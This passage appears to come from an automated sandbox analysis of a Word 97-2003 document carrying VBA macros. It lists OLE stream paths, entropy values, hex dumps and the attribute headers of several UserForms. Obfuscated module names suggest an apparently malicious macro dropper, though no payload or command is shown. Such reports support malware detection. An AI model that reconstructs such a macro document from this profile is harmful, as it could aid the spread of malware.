VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{2D23F958-D2D9-4832-928D-FB33041E5587}{825B89C9-94E3-46E3-BC0F-A2DC216A1D77}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm3, Stream Size: 1160

General
Stream Path:	Macros/VBA/UserForm3
VBA File Name:	UserForm3
Stream Size:	1160
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 1b cf ad 34 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_Base
VB_Customizable
VB_TemplateDerived
VB_Exposed
VB_GlobalNameSpace

VBA Code

Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{1F3E43FD-F8BE-4426-9384-C6A88D75F1C9}{D40BF70E-BE28-4285-9F4F-3488ADA6BC4B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm4, Stream Size: 1160

General
Stream Path:	Macros/VBA/UserForm4
VBA File Name:	UserForm4
Stream Size:	1160
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 1b cf 82 be 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
VB_Creatable
False
VB_Exposed
Attribute
VB_Name
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{6EB2EE04-13A3-4362-BA3F-59875CB1EF58}{9BBDA8EB-AD12-4F4D-93E8-0EF91D5DFAF4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm5, Stream Size: 1160

General
Stream Path:	Macros/VBA/UserForm5
VBA File Name:	UserForm5
Stream Size:	1160
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 1b cf 6d 9e 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Base
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{F87A6A7A-77E7-4161-9232-75F50A9CDC8F}{EE80D04B-EC7B-4C25-B93D-02A7611C2194}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.2359563651
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.252421588676
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 600

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	600
Entropy:	4.34240296201
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 28 02 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 74 01 00 00 04 00 00 00 5c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 7819

General
Stream Path:	1Table
File Type:	data
Stream Size:	7819
Entropy:	5.72407558388
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 99189

General
Stream Path:	Data
File Type:	data
Stream Size:	99189
Entropy:	7.38975684507
Base64 Encoded:	True
Data ASCII:	u . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . $ . . . B e . . . . . # + < . * . . . . . . . . . . D . . . . . S . . F . . . . . . $ . . . B e . . . . . # + < . * . . . . . .
Data Raw:	75 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 904

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	904
Entropy:	5.33413393328
Base64 Encoded:	True
Data ASCII:	I D = " { 4 9 0 C F C 1 1 - 6 E 1 C - 4 5 C 7 - A 7 C 0 - 8 7 0 8 2 8 C D 4 9 7 1 } " . . D o c u m e n t = T 6 d w l v _ i v p o i q 2 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . B a s e C l a s s = U s e r F o r m 2 . . B a s e C l a s s = U s e r F o r m 3 . . B a s e C l a s s = U s e r F o r m 4 . . B a s e C l a s s = U s e r F o r m 5 . . M o d u l e = D w z t p w k m g v 8 q 9 o 2
Data Raw:	49 44 3d 22 7b 34 39 30 43 46 43 31 31 2d 36 45 31 43 2d 34 35 43 37 2d 41 37 43 30 2d 38 37 30 38 32 38 43 44 34 39 37 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 36 64 77 6c 76 5f 69 76 70 6f 69 71 32 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 296

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	296
Entropy:	3.8062024914
Base64 Encoded:	False
Data ASCII:	T 6 d w l v _ i v p o i q 2 . T . 6 . d . w . l . v . _ . i . v . p . o . i . q . 2 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . U s e r F o r m 3 . U . s . e . r . F . o . r . m . 3 . . . U s e r F o r m 4 . U . s . e . r . F . o . r . m . 4 . . . U s e r F o r m 5 . U . s . e . r . F . o . r . m . 5 . . . D w z t p w k m g v 8 q 9 o 2 8 r . D . w . z . t . p . w . k . m . g . v . 8 . q . 9 . o . 2 . 8 . r . . . J 7 l m k 7 x
Data Raw:	54 36 64 77 6c 76 5f 69 76 70 6f 69 71 32 00 54 00 36 00 64 00 77 00 6c 00 76 00 5f 00 69 00 76 00 70 00 6f 00 69 00 71 00 32 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 55 73 65 72 46 6f 72 6d 33 00 55 00 73 00 65 00 72 00 46 00 6f 00 72

Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/UserForm1/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266

General
Stream Path:	Macros/UserForm1/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	266
Entropy:	4.62034133633
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 38

General
Stream Path:	Macros/UserForm1/f
File Type:	data
Stream Size:	38
Entropy:	1.54052096453
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/UserForm1/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Macros/UserForm2/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/UserForm2/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266

General
Stream Path:	Macros/UserForm2/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	266
Entropy:	4.62970308443
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U s e r F o r m 2 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 32 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm2/f, File Type: data, Stream Size: 38

General
Stream Path:	Macros/UserForm2/f
File Type:	data
Stream Size:	38
Entropy:	1.54052096453
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm2/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/UserForm2/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Macros/UserForm3/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/UserForm3/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266

General
Stream Path:	Macros/UserForm3/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	266
Entropy:	4.63438395848
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 3 . . C a p t i o n = " U s e r F o r m 3 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 33 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm3/f, File Type: data, Stream Size: 38

General
Stream Path:	Macros/UserForm3/f
File Type:	data
Stream Size:	38
Entropy:	1.54052096453
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm3/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/UserForm3/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Macros/UserForm4/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/UserForm4/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266

General
Stream Path:	Macros/UserForm4/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	266
Entropy:	4.62402723855
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 4 . . C a p t i o n = " U s e r F o r m 4 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 34 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm4/f, File Type: data, Stream Size: 38

General
Stream Path:	Macros/UserForm4/f
File Type:	data
Stream Size:	38
Entropy:	1.54052096453
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm4/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/UserForm4/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Macros/UserForm5/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/UserForm5/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm5/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266

General
Stream Path:	Macros/UserForm5/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	266
Entropy:	4.62202697924
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 5 . . C a p t i o n = " U s e r F o r m 5 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 35 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 35 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm5/f, File Type: data, Stream Size: 38

General
Stream Path:	Macros/UserForm5/f
File Type:	data
Stream Size:	38
Entropy:	1.54052096453
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm5/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/UserForm5/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 6101

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	6101
Entropy:	5.31036158418
Base64 Encoded:	False
